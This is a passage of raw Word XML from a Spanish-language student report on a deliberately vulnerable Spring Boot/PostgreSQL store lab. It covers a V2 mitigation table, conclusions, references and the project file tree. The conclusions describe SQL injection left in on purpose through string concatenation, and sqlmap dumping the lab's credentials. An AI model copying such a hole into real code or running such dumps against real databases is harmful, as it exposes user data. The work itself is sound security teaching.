              <w:t>Intentos repetidos generan 429 o bloqueo controlado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="2DF7FC78" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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9132E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 xml:space="preserve">Upload </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>inseguro</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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17FF0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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Whitelist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>magic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> bytes, UUID y almacenamiento privado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3345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15E4D1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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Archivo no permitido es rechazado sin guardarse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="068EF57B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D5991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 xml:space="preserve">Logs </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>sensibles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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81DE93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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Enmascarado y eventos de seguridad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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449181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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Logs no </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">contienen </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> ni token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="0DFC7F97" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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6C2D93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5"/>
              </w:rPr>
              <w:t>Stacktrace</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3572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1D3B98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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Error genérico e id de correlación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3345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83EBDF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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Cliente no recibe clase Java, SQL ni rutas internas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="01AB9B16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B77276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5"/>
              </w:rPr>
              <w:t>Transporte</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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EF1F5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Nginx con certificado TLS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334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851CB9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sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>HTTP redirige a HTTPS y TLS 1.2/1.3 está activo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F693F1C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A6DDC7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:t>14. Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63970C82" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La V1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>materializa vulnerabilidades de aplicación, configuración, autenticación, dependencias, integridad y manejo de errores en una tienda funcional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7C2C0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite reproducir un escenario cercano a una arquitectura real de tres capas sin exponer la apli</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>cación fuera del equipo local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E870C53" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La concatenación directa en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ProductRepositoryJdbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite demostrar SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> manual y automatizada; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede enumerar PostgreSQL y volcar las credenciales de laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0BE6B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">La comparación entre V1 y V2 debe realizarse </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>repitiendo los mismos intentos y verificando que la V2 rechace, limite o neutralice cada ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5E8DD" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas"/>
        <w:spacing w:after="40" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Las evidencias pendientes deben insertarse en los espacios reservados antes de la entrega final, manteniendo numeración, título y fuente.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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="375D758E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="1F6F50"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil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831F87" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F6F50"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Estado del documento:</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F6F50"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Contenido técnico, estructura y comandos finalizados. Pendiente únicamente incorporar las capturas obtenidas por el equipo y completar el nombre del docente en la carátula.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="177397A3" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>15. Referencias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D13E4" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker, Inc. (s. f.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Compose documentation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https://docs.docker.com/compose/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740FD33" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Nginx, Inc. (s. f.). NGINX documentation. https://nginx.org/en/docs/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E7288" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OWASP Foundation. (2025). OWASP Top 10:2025. https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC9F8D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OWASP Foundation. (s. f.). OWASP Dependency-Check. https://owasp.org/www-project-dep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endency-check/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841BD63" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL Global Development Group. (s. f.). </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 16 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>documentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>. https://www.postgresql.org/docs/16/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B5EA5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Spring. (2024). Spring Boot 3.2 reference documentation. https://docs.spring.io/spring-boot/docs/3.2.x/reference/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683ADE6B" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap Proj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ect. (s. f.). sqlmap: automatic SQL injection and database takeover tool. https://sqlmap.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3573A017" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD15771" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Anexo A - Estructura del proyecto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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="5F40D66B" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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44FAA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rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>tienda-insegura-v1-mejorada/</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>backend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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">/                    API REST Spring </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Boot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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>frontend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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">/                   HTML, CSS y </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>database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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">/                   </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>init.sql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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y backup-v1.sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">/                     Configuración </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Nginx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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docs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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>/                       Arquitectura, despliegue y pruebas</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>pentesting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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>/</w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>/          Guía y scripts automatizados</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t>|-- evid</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>encias/                 Capturas y salidas</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t>|-- scripts/                    Verificación del laboratorio</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">|-- </w:t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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker-compose.yml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6"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t>|-- .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>env.example</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t>|-- README.md</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:br/>
              <w:t>`-- Informe_Tecnico_Final_Tienda_Insegura_V1.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="556EA069" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100CB84F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Los archivos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>schema.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>data.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">encuentran dentro de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
